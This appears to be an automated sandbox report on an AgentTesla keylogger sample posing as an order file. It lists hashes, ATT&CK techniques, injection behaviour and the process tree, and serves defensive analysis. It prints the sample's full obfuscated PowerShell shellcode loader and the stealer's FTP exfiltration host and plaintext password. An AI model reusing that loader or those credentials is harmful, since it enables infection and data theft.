agenttesla | a06b89ab8de11d1a00a2cfaafeafa96a84e1c867c9650d2574ab5c5965195ce8

General

Target

Order #K0137080.vbs
Size

236KB
MD5

96fab6f37daa6c05627d826d62db3199
SHA1

1ab3d160bc854e0cbc875438896c58d6c4c886b2
SHA256

1cd7d45d2466ce4a8220edc05bc8a9141e89f80e7e0f33ff61a6200011442bad
SHA512

059a9a60221f117f2258b14bfa218351f913156635e79751534256a1d9bc2867c0ced84f5bba3c4345c41e0aded7fde6471d1c294fc2569672010e31a88d9ccd
SSDEEP

6144:D78FFZJ4u+WvCjd2Zj21DL8rWl5/0ahnAMANPh:X8FP9XvCjd2h2tL0STVAdh

Score

10^/10

agenttesla keylogger spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: ftp
Host:
ftp://ftp.lansol.com
Port:
21
Username:
[email protected]
Password:
@t6cIop2jJgW

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Checks QEMU agent file 2 TTPs 2 IoCs

Checks presence of QEMU agent, possibly to detect virtualization.

Query Registry

T1012

System Information Discovery

T1082

Processes:

powershell.execaspol.exe

description	ioc	process
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	powershell.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	caspol.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

caspol.exe

pid process

1248 caspol.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.execaspol.exe

pid process

572 powershell.exe
1248 caspol.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 572 set thread context of 1248 572 powershell.exe caspol.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

572 powershell.exe
Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

powershell.exe

pid process

572 powershell.exe
572 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 572 powershell.exe

pid	process
1248	caspol.exe

pid	process
572	powershell.exe
1248	caspol.exe

description	pid	process	target process
PID 572 set thread context of 1248	572	powershell.exe	caspol.exe

pid	process
572	powershell.exe

pid	process
572	powershell.exe
572	powershell.exe

description	pid	process
Token: SeDebugPrivilege	572	powershell.exe

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

WScript.exepowershell.execsc.execaspol.exe

description	pid	process	target process
PID 2040 wrote to memory of 2008	2040	WScript.exe	cmd.exe
PID 2040 wrote to memory of 2008	2040	WScript.exe	cmd.exe
PID 2040 wrote to memory of 2008	2040	WScript.exe	cmd.exe
PID 2040 wrote to memory of 572	2040	WScript.exe	powershell.exe
PID 2040 wrote to memory of 572	2040	WScript.exe	powershell.exe
PID 2040 wrote to memory of 572	2040	WScript.exe	powershell.exe
PID 2040 wrote to memory of 572	2040	WScript.exe	powershell.exe
PID 572 wrote to memory of 1008	572	powershell.exe	csc.exe
PID 572 wrote to memory of 1008	572	powershell.exe	csc.exe
PID 572 wrote to memory of 1008	572	powershell.exe	csc.exe
PID 572 wrote to memory of 1008	572	powershell.exe	csc.exe
PID 1008 wrote to memory of 764	1008	csc.exe	cvtres.exe
PID 1008 wrote to memory of 764	1008	csc.exe	cvtres.exe
PID 1008 wrote to memory of 764	1008	csc.exe	cvtres.exe
PID 1008 wrote to memory of 764	1008	csc.exe	cvtres.exe
PID 572 wrote to memory of 1900	572	powershell.exe	caspol.exe
PID 572 wrote to memory of 1900	572	powershell.exe	caspol.exe
PID 572 wrote to memory of 1900	572	powershell.exe	caspol.exe
PID 572 wrote to memory of 1900	572	powershell.exe	caspol.exe
PID 572 wrote to memory of 1248	572	powershell.exe	caspol.exe
PID 572 wrote to memory of 1248	572	powershell.exe	caspol.exe
PID 572 wrote to memory of 1248	572	powershell.exe	caspol.exe
PID 572 wrote to memory of 1248	572	powershell.exe	caspol.exe
PID 572 wrote to memory of 1248	572	powershell.exe	caspol.exe
PID 1248 wrote to memory of 1988	1248	caspol.exe	dw20.exe
PID 1248 wrote to memory of 1988	1248	caspol.exe	dw20.exe
PID 1248 wrote to memory of 1988	1248	caspol.exe	dw20.exe
PID 1248 wrote to memory of 1988	1248	caspol.exe	dw20.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Order #K0137080.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2040

C:\Windows\System32\cmd.exe
cmd /c echo C:\Users\Admin\AppData\Local\Temp\Order #K0137080.vbs
2⤵
PID:2008

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Preenact = """DdeliAGrunddKimendDiape-KvaliTEksteyCrotapIndvaeCondu Cocob-CheerTSciuryPteropPerideIrritDHovedeScorpfRone iBludgnFfer iDokumtFriskiPilesoAscrinEndoc Amont'GravauFrmndsGaraniBoblenInfergKaste PeponSTreskyOtes sYattetPictoeEstremdokke;ApathuProbosnonphiSemannAffusgGalio PreobSPyrolyIntersArctotOvermeOctanmLiven.Futz RhopeluTribunUttertRunnyiOpilomUdpegeSlagp.deadmIMoltenFortotKvindeKrimirSlendoIsblopSlagsSSnurreFolkerPleurvStampiPrimfcUnneieAnmelsElekt;WrackpEmpatuAwashbPeopllBilfriDenigcTrego GgeunsDaledtVitupaShacktEnukkiKrydscDacty DepracMiljalSkraaanematsTabulsEctro VentaMInkluaQuatunBos SimorgefSknhe1Norma{Trots[ManicDModislrappelLeadwISrogamUnlikpNonsioRokkerSupertAndag(Bedoe`"""RyslegParacdNarraiUnroy3Amnes2Radil`"""Jerry)Topfo]inddapbumphuFlovmbconvelUntroitegnecFyrfa AbbiesRoisttanthoaKochatFlappiUdloecKlyng UnwhieIndhexSikketScungeElfhorConstnPearc PoppeiBedeknThy StBriga ProviGwellheAraujtContrRcopouaBromisStabltIdeogerininrStberiTannazSiddeeWicherZinobCserviaProtopHeptasUnsup(SerigiMarksnTeleotkende TyndtSFeriekOdwyeoDeclavFaikepmut dikrypt,FasciiAstarndvrgetPiete UnhitbAktiviSloppfDerovlForhaaPaasegPulah)Alema;Bevis[UdskrDFerrilTyroslGery ILitermPraespStrejoEmbalrDesertAftag(Theop`"""DriblgAaer dFormuiEcoph3Chiev2Nonma`"""Shaki)misfo]HjemmpBraseuchartbMedbelMirmeiSafiacKemik BrugesPredetponesaSkrmftSkibsiFele cforsk GenneeInfraxForsktLeen ePapegrTommenExtan BetaliCathynTorsktLitho omdmmSTeletePargolagtsoeZoostcAlpehtBeboeOvegnebTonefjClammeTubifcCellotSeise(MonaliObelinMelantMedga PorteOafflimAmylodCircuoHemoceDonac,DisoriPhilanArrastPropd AortaMklumsiUdmntnPolst)Momen;Brach[AntisDAttrilSkrgalSeineIDemasmsedatpRomanoCurrirCopoutSpejl(Undog`"""PitchkOphioeMigrarAnournBestyetrustlLengt3Konom2Gramn`"""Strut)alist]BumphpReliguTurbabSautelPunchiResetcOxidi AzeotsfilmstBagklaroyettInteriGeisocOphth AntiueBaccaxHandetAbstieHyperrTriannBaade MateriDaarlnGragetZanne DyrekVDistaiunglarAllotttarifuCoqueaPsykolOkkulAUnderlKlostlOverposlew cUrins(preniiNitinnForbitVbnen GerrivMagre1Optag,DeveriKomminDakoitForfi BoegevBropi2Toldb,StaveiTrypanStocktAttra FilmfvHjemm3Lepor,FumleiAristnsoulftUnder FrilgvAdpro4Vejgr)Kompe;Menth[AfprvDBetrnlgtterlAmoy IInflomCircupSmittoLonnirKolhotInter(Hvids`"""EskalgInsindnettoiFlyve3Pussc2Unfin`"""Affar)funge]bugsepFiskeuFodinbShootlByt KiSvklicbrutt InforsMispltmalthaTenzotSerieiByltecFamil AnimeeskavaxOpstatAfruneAgterrPulmonBevik KameliUnrecnKldevtUnhyp GrmmeGudvanefrilutGrandCDagdrhLanceaSenatrDragoAUnderBNeuroCVaporWFini ieleutdFintftTantahCostlsboota(TilveiPolycnPotamtDolle MilitRDriftuPerfoeLeechwMundh,OrnitiSyndinCinchtMinim Hova VPereseUnbelrRetsiiAlbat,DuelbiUnaffnHearttForby UnrusbThorbuPhearnMalaxgGudstaRomanlPosit,MelleiTimennAortatikraf LandsVGlasfoOverblforsi)Krlig;Atoma[AnqueDAdenolBiddalUdkigIBrskumBetrupFavoroEtaarrRefletStarc(Count`"""SubanuFacadsAsketelensbrUtjet3Rests2splen`"""Telev)Carke]CasaspOos HuBl WebPodoclafpreiPrecocRadio AppetsPosittKugleaBacchtUnpitiBlankcPermi JagtkeTrskexAnerktPastoeSubverNarronforel BagkliBendinBandetEgois RenotDHydrodCusk ebarkaKTrkkreSvrdleArmfupCrissSLaveltsmykkrmiljsiTarlanDiagrgProteHLandsacloudnPastrdRegnllFjogseSekst(SuppoiKlampnSpttetVatik sdet NModesoUnifinRecencMeathoPieti,ParapiDesinnUtaentFanta MenubCosciliParegsPewy )Flage;Escri[GobblDSkan lCantelAnthrIBrachmProfopVedlgoFimblrSerpetKomme(Pres `"""TransiRejfnmAllylmPjalt3Sabba2Slidf.SelvbdHollylFuldslbhind`"""Touzl)Engan]PhotopPattiuPattebPseudlMyremiStaascHaded barsesGennetAlarmaMaaletPac AifunktcProce SendeeJoas xMaanetPostgeFiffirDobbenResig genzaiSoignnPreditTjrne StancIPjattmFlaskmMisbiSVanadeGaabetDich CUnrecoSymbonAutonvDraweeForesrUnivesZoopaiMokkeoSubemnKolbaSForsytBaronaArtertUdbruuTheatsboyd (SamfuiBikagnPhlebtpeart AdmirRCatafeSeddesAlgeriEb GasUfuldtRecip,VarieiUdspnnOverrtforbr HogstCAnnotrFiffiyGrovepRefletZaireoUncer,disloiIndkbnNemmetMicro ExhalTSktteiPropigundecePullarCoate)Perip;Direc[DiagnDStjislOmforlLrlinIByvaamMerleprepleoMidverKvrultObol (Skjor`"""EupnokLegeneAntiprAtrabnTilskeSknlilConsa3Anoma2Germa`"""Ply F)Barfo]DeltipAltabuTittebGarb lAntihiThreacOverw FostesButiktSlvrvaBookbtVarskiLump cFupp LarsieOldfrxtalkotUncomegahnirUndernTelem AgoraiProgenIndkltForsi AdsorCCoffirLnpoteUnpolaHeftetDukkeeAmorpMSmuttaAnthriOomyclCuddisIndanlTomleoAmanitEnlig(paamniKrusnnOmslutKapgn MbundhIlloyoOxyphnPostgeComprySelvubForge,arcneiRadianTerpetTagpa UnlitKOrtodlresoraTerrnnShaitgBodyb,IndgriTankrnarsentProte LefthUUnisonAstroaForldnOverf,HardiiNyttenNonprtGlusi ServeHOverboTppersUbala)Undsa;Saltp[StmagDCoherlEkspalHugenIFaldlmNonflpPuppyogeninrOsciltBarra(Precr`"""TraadvHosesePrimfrAfpudsStoreiRias oFoedenSysta.betredDecallFlyndlkonge`"""Alter)Rytte]RestapOutskuTalenbOverslAnthriSkuddcHatch HjemksKomfotForceaCotratTappeiPalpucPseud HandleDiabrxKarbutAstroeinswarStenonBroma BathmidatabnOpvedtWheel TryklVmusteeMalicrPsychQPontouDiatreSellerprotoyGoniaVIntimaWaistlTrichuUborgePisto(DaleyiFistunVoxeltSedde SlibrCShoeloheteriChamininterarespe,TaleuiPantynUnmertBogsk ForsmGFortrubriannBeedofTragtotundruInez ,WeepiiKamarnTrieltLabor SnapsUWorlddPudsiecoronhRekapoCenoblPicul,BonifiToetanGrnsetSinec DelraAStetonEnkeltUranooBrunonPelar)Stret;Regen[NongeDBerenlHeliolInforIAnalymPhalapSkimpoInferrMelantPatte(Integ`"""frafawFleksiGangenFemetsPishopNoteloDialeoKurvelEmbar.DorindOvardrSkyldvUnexp`"""Photo)Svens]SnackpEvanguBidedbThulrlLypemiSamorcGruff HrsilsHogantCher aaabentWateriTubercPenal GranseDisplxLaksetFistueTransrFaconnBloms LocatiTopfonGlanstRadia MagenERegionSabotdBombaDKnopsoAppalcSindsPPetfurSanktiRaspenBrysttKonfoeSignarMatch(egoisiThorgnCelletnomad StuccUForurnConspsdeprecOverwoNedstwVaffe)Scrab;Indbe[MirroDParamlWhisklindesIOmkrsmGaranpmedvioFarmarTowd tSejrr(There`"""ParteuOvercsStanseAmortrGrund3Brygg2Inapp`"""Mavie)Annoy]GstefpChromuAgio bBenzilInderiFaarecsepte EnophssemidtTriviaThougtStormiRevapcMurme SkatteFarlexCancetReacqeFlexirPreomnValme PalaeiFidgenincuntmanoe OrkesSCompaeFedtrtSubatCFarfduDyschrQuartsMaqueoMyrderLongi(Sol LiFllesnFags tTydni LastvCcakewlRichaaTraitwidelrkPukleeUnpoe)Jerem;Tarta[SulevDNgleplJenbrlPentaIPubermstadspUnworoFormarBorsutPales(Ligeg`"""VolcakJacobeBarberBrainnManddeVasculVgtaf3Logge2Cente`"""Kulde)Sprng]BrummpAssenuUordeborganlMaleribrnehcColli FraissStilltSkillaPlushtKlik iVrgercLaven SacalecentrxBlasttCrimoeUsehorheilsnScyll AptotiuforlnMiswrtDiskf OverdLHulefoHailscDusinaHudiblForudFAhuaciSkolelcamboeFleriTLymphihalsemKolbjeDibasTPlasooUnderFRunabiChawklmuslieBambuTPostbiAfdelmBabbleGramm(KremeiChlornCymentMesos SvellDCynoprPoteniAntipvStjerhLeave,SplitiValgdnGonostDiato OpsliLTilliiCrimibFornyaBebudnLandziunder8Sinus6Heart)Didri;dagpe[BedveDDataslForgalAngreIAnatemPointpSmeltoErindrGenoptRefer(Hemat`"""ReffokPharieBeeferSprylnXenofeLuskelMakul3Overb2Palmi`"""Upaal)Bikin]HaandpTopsiuOrdrebBrdsklOphiaiExtracThatc HestesFremmtUsynlaStjfrtEnsafiForgrcBanne IntereViveuxAhisttInvareEngrorSorannAvlsh HjertiPeccanKuriotPremi SnigmLSpleeoBankfcTeletkAfskeRUnriteOttilsAarsaoGraviuPullmrChorecdefenePlade(NabosiDirkenLinnatLepto FrisvDTropprLilieidorsakVerde)umenn;Alaba[CliquDKretjlSclerlPanadIArbejmBrstepTahinoFlammrSkuretBogsk(Bruge`"""BoiesuNonacsSpejleAleutrOverd3Syven2Stamv`"""Overf)Disap]FugtipDoubluMakkebDescelReforiBrochcHyrek RyghvsOmegntKoloraMetabtFrkeniGriefcSben NdsteeUnderxSuicitAnthoeBrevfrNyhednEpacr LgnhaIFravrnabashtBehagPkelimtProverStorm MaskiEOstepnSynaguStyrmmSjuskWKommuiTeskenUdhngdNippooIngelwhaemoSKldertplannaSenattChurciTredjoTappenQueersTilvaWdiscr(SagsfuAuthoiSprannFiksatPorte LongjvAagot1Satir,SkrmfiNp DanBarartBookr NonicvAdept2Tease)Unive;Subfu}Awaft'Frems;Killi`$AngulMNaturaBlakknPrepriAbacifPrint3Havva=Mater[ManipMmonogaGnoffnBesluiSynopfHydro1eskim]Probl:Defin:ChimaVSpermiPheocrSlimitKaprouLandsaUdlodlSmigrAHeneqlTrundlSeddeoFgt GcPegox(Multi0Ortho,Emanc1Haben0Marke4Modej8Boxma5Flodd7Euphe6Wiene,Intet1Dipro2Precr2Umaad8Cyclo8Tykke,harpw6Scout4retro)Tular;Ligni`$VellyKQuickrDysidiIndlegBefroeRasperunfereIncinsMidwi=Prota(IntraGStreneCrofttLette-StereIaffaltBradyeIndfamPriggPDaymerRegntotypifptechneUdkogrSulfotManuryTospr Brygm-BronzPDanaiaVrtpltChamphtosse Inter'FortrHImmouKTolvfCKonomUzoolo:Plane\BestsFLycoprSkrifeUndermPisse\AgompLSickeuSolitxblottuCrownrModviiHetereServinparaktInfla1Refer1Canad9Subsa'Toldk)luftf.SharpHGruopjUninfeFoundrKahyttHutcheAcatafFyrst;Ety A`$SalmiOGeothnFalsnkDuefalItemieHjdeprTimorbTangerSnookeVanda Indva=Scutt Under[FiksfSUgtheySkravsHjerttBrandeEulogmOvera.KultiCBrancoBlindnFarvevAvlsbeOvercrTemaetVoldt]Unamo:Tidss:ElskeFSulforTotaloEncromPlaywBGarvyaOptimsSelskeDepre6Anagr4LeaveSFakultMucosrJourniBastanCretagBowel(Sixty`$TurboKFradrrGuldeiWeekegtilsyeAmatirDresseLangssCervi)Ethol;paask[AfspnSAssocyLnnensUdstttCoenaeGlacimBevog.paastRIncgruUnpacnSanaitCapiliBrunemlovgieFavou.MalprIDrmmenUselvtFrameeDekodrSolidoBullipRigtiSUnprueBrunhrExecrvProgriCatchcEftereYugossLawye.NondeMStaveaKoglerOffersInvadhArbejaEarpilBjrgn]Europ:Slutb:TurbiCTricaoJuglapGenneyDehon(Nonso`$HypaxOmedvinUdkankVidnelDulmeeDisilrUnderbOmpharEvigheUnder,Relse Decol0Resta,Binox Opfin Omega`$KasseMLingvaModifnUnderiThornfGodmo3Afkld,Lowmo Vansk`$UnwhiOKodesnFlngekkontulBronzePiberrVodenbMyelerAnakrepredi.CinercPrenaoHounduMagtfnStilltEpris)Razor;stryg[FolkeMPropeaMatrinJordtiSperlfLeksi1Untro]Maler:Toxos:PapirEHypernStabeuMerogmSkovtWBltesiInternJiffsdIntrvoLindrwprespSTempotligesaArveltIndiviTabeloMidt nGeronsMicroWRevol(Under`$KiwifMVersiaSelvanMultiiTomhofBelaa3Nya O,Fiske Ola S0Offsc)Frizz#Kurvb;""";Function Manif4 { param([String]$HS); For($i=5; $i -lt $HS.Length-1; $i+=(5+1)){ $Folker = $Folker + $HS.Substring($i, 1); } $Folker;}$Satinkla0 = Manif4 'SaaleIHindbEBelliXRamni ';$Satinkla1= Manif4 $Preenact;& ($Satinkla0) $Satinkla1;;"
2⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:572

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wxslygru.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:1008

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES38FD.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC38FC.tmp"
4⤵
PID:764

C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe"
3⤵
PID:1900

C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe"
3⤵
- Checks QEMU agent file
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:1248

C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
dw20.exe -x -s 972
4⤵
PID:1988

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES38FD.tmp
Filesize
1KB

MD5
cbeff5718a1b85a8c93a7d56bacb8aa6

SHA1
7516ddf2e7311e1b76798b31194ab7406e5d2681

SHA256
6586135f3fbf5c79f35a500bb07e4ebc92614d1fb8957df3d9236337200535a4

SHA512
7aeff01e65542b7bc3b3eeb46343c1f3de8d26db6bcf7e9c7299580dfcb32bea866c1e8036e991d79b225bbdfeb0de16d6b37cb18b5ebb5b5e468ad42232848e

Download Submit
C:\Users\Admin\AppData\Local\Temp\wxslygru.dll
Filesize
4KB

MD5
337d80fc9834915c5fe05ee7c1b20dc0

SHA1
db2f3fe5f719056563d4edeaafc28e3929a4fcab

SHA256
600816a0389f1466d1cf48bb77ae87276c02af63fdecfab5e9eeed44014b7fde

SHA512
3081d03cb7a7c8b882615ad680442c1a1b599431a4c7fc53e19903afb2394eee3af5224cae4cb9bba63ea870b4d8f1b3e25b8aabc2428f3f9b96838dadd4e137

Download Submit
C:\Users\Admin\AppData\Local\Temp\wxslygru.pdb
Filesize
7KB

MD5
3ab7cc5b6ae8d5f7d6b6141bb2d146b2

SHA1
f5c7132097a276f2b75038156b8cfb88e58b0c92

SHA256
e3e1eb11b9e07edf53f758111644414a571f9aee47f06928a12c82dcaf7e29b6

SHA512
dc8eff526e2fe4e501996c778e895fc23d056ae62085ff9895695197591b3ee91c78153ee6ad0f7b06a98ade1fec27ecf8d887489b5442c4235f47c5bcd71128

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC38FC.tmp
Filesize
652B

MD5
e6e4618c0731f0641b62504bebf56cfe

SHA1
304f96a83f816e0dc67e1f5d5cdb851d0aa1479f

SHA256
8241c9e5499727bf50c91b9ab2c3d2c46a687a22cc5d4f6e274c46c4503084d6

SHA512
e2c308189b237dd9c966b76ae15bed6c5da414daa61b789009bd8ef3817bafba5a1e76f37167b291121e67843d4e1ea1d2930f9a537a8a2d73bb565ff8064ee7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wxslygru.0.cs
Filesize
1KB

MD5
a1296b9b26069c44d0b493960cd2341a

SHA1
5df1108d08bce013f011876157746603e884a35e

SHA256
d004ed7b87a24a6af37088f2389a1b1fb1dcf42670190884ed616ab8f23d8148

SHA512
2912e622d5d6d600bb901c384930ef3ba9410befc370dfd7a30b0bda08c8dfbdc004733c8a328a3560eef7619102e3a1ee2870cd709558780b2eb8709efd9541

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wxslygru.cmdline
Filesize
309B

MD5
85d80e7a2378d4db46b052516e0055da

SHA1
d3c4a13afe841517d3cb2cbd01bb3cdb9033f6f8

SHA256
85a552bfc3ea87d10b4ce07472a155081b0f3d595c21ec65fc7b6b3fa1cfb36a

SHA512
252d0968f14605739bc4c4dc47f0a89b43dfcc4e3b57eb674bdfe14e1a3c2ed1ac23a62c71ef9e8b06a30d7358a84f54f2b68739a6a879d8266970f9d5814f39

Download Submit
memory/572-93-0x0000000004FD0000-0x00000000050D0000-memory.dmp

Filesize
1024KB

Download
memory/572-67-0x0000000004FD0000-0x00000000050D0000-memory.dmp

Filesize
1024KB

Download
memory/572-80-0x00000000779F0000-0x0000000077B70000-memory.dmp

Filesize
1.5MB

Download
memory/572-58-0x0000000074280000-0x000000007482B000-memory.dmp

Filesize
5.7MB

Download
memory/572-57-0x0000000076691000-0x0000000076693000-memory.dmp

Filesize
8KB

Download
memory/572-56-0x0000000000000000-mapping.dmp

Download
memory/572-94-0x00000000779F0000-0x0000000077B70000-memory.dmp

Filesize
1.5MB

Download
memory/572-77-0x00000000779F0000-0x0000000077B70000-memory.dmp

Filesize
1.5MB

Download
memory/572-68-0x0000000074280000-0x000000007482B000-memory.dmp

Filesize
5.7MB

Download
memory/572-69-0x0000000004FD0000-0x00000000050D0000-memory.dmp

Filesize
1024KB

Download
memory/572-71-0x0000000077810000-0x00000000779B9000-memory.dmp

Filesize
1.7MB

Download
memory/572-72-0x00000000779F0000-0x0000000077B70000-memory.dmp

Filesize
1.5MB

Download
memory/572-79-0x00000000779F0000-0x0000000077B70000-memory.dmp

Filesize
1.5MB

Download
memory/572-76-0x00000000779F0000-0x0000000077B70000-memory.dmp

Filesize
1.5MB

Download
memory/764-62-0x0000000000000000-mapping.dmp

Download
memory/1008-59-0x0000000000000000-mapping.dmp

Download
memory/1248-87-0x0000000000401000-0x0000000000615000-memory.dmp

Filesize
2.1MB

Download
memory/1248-81-0x0000000000280000-0x0000000000380000-memory.dmp

Filesize
1024KB

Download
memory/1248-85-0x0000000077810000-0x00000000779B9000-memory.dmp

Filesize
1.7MB

Download
memory/1248-86-0x0000000000400000-0x0000000000615000-memory.dmp

Filesize
2.1MB

Download
memory/1248-78-0x0000000000280000-0x0000000000380000-memory.dmp

Filesize
1024KB

Download
memory/1248-89-0x0000000000400000-0x000000000043A000-memory.dmp

Filesize
232KB

Download
memory/1248-92-0x0000000074280000-0x000000007482B000-memory.dmp

Filesize
5.7MB

Download
memory/1248-75-0x0000000000BD8A9E-mapping.dmp

Download
memory/1248-95-0x0000000074280000-0x000000007482B000-memory.dmp

Filesize
5.7MB

Download
memory/1988-90-0x0000000000000000-mapping.dmp

Download
memory/2008-54-0x0000000000000000-mapping.dmp

Download
memory/2040-55-0x000007FEFC091000-0x000007FEFC093000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing